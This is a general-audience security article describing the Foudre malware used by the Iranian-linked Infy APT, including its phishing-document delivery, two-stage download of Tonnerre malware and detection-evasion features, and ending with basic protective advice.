Cyberwarfare is far more prevalent than a regular user thinks. Whatever you hear or see on the news is just a tip of an iceberg, and security researchers have to grapple with multiple threat agents every single day. Foudre Malware is one of such infections that is used in cyberwarfare. A regular user may not know much about such threats because they usually target corporate computers. However, everyone could be targeted by this malicious actor.
Foudre Malware is a malicious program that is thought to be created by Iranian state-backed hackers. The operation behind this malware is called Infy or Prince of Persia. And no, they are not related to the game whatsoever. The operation has been known since 2007, although it constantly reinvents itself and comes back with new versions of malware. Hence, Infy is known as an APT or Advanced Persistent Threat.
Infy mostly focuses on PCs, and the operation employs malware to indulge in cyberespionage. Over the years, the operation has employed various malware components to eavesdrop on their victims. Foudre Malware was first used in 2017. The name for the malware comes from one of its keylogging windows and it means “lightning” in French.
A new version of the Foudre Malware infection was detected in 2020. Like most of the previously used Foudre Malware components, it is programmed in the Delphi programming language. To put it simply, this malware works like a carriage that brings in a second-stage payload into the target system. It is like a nutshell that once cracked releases the real player into the wild. This player is called Tonnerre Malware, and we will discuss this infection in greater detail in our next entry.
So, how do users get infected with Foudre Malware? Usually, the infection reaches its victims through spam or phishing emails. These are mostly targeted phishing emails because they aim at certain victims. The previous versions of Foudre Malware would arrive through outgoing links that supposedly should open a video. However, this new version of Foudre Malware launches when users close the dangerous document, and it triggers a malicious macro to run.
The document in question is often some kind of photo of an Iranian official and their phone number (the phone number is usually fake). There are also instances where documents supposedly sent by various Persian organizations and foundations are used to lure unsuspecting victims. Either way, the victims do not need to click anywhere on the document. Just opening it is enough for Foudre Malware to run automatically when the document is closed. Here is essentially what happens when victims trigger the malware installation:
- The macro downloads the first-stage payload with Foudre Malware,
- Foudre Malware connects to its command and control (C2) server and downloads Tonnerre Malware,
- Tonnerre Malware starts running and receives further commands.
This is where the shell of Foudre Malware falls off and then Tonnerre Malware takes over to carry on its espionage activities. Everything happens behind the victim’s back. What’s more, the newest Foudre Malware version is also better at avoiding detection because it comes with three key differences, compared to the previous versions.
First, it uses the DGA Formula to avoid detection. It is an updated algorithm that generates domains. Another thing that increases the stealth level is the C2 RSA verification where Foudre Malware downloads a digital signature file from its C2 and verifies it. We also mentioned that this threat gets its name from one of its keylogging windows, but the newest version misses this component, too. Security researchers believe that this update allows the infection to avoid signature detection.
All in all, it is possible to avoid Foudre Malware and other related infections if potential victims are vigilant and review their cybersecurity knowledge frequently. On the other hand, these threat actors are stealthy and might run in the background of the compromised system for a long time before anyone takes heed. Hence, regular system scans with licensed security products are vital for early detection and swift malware removal.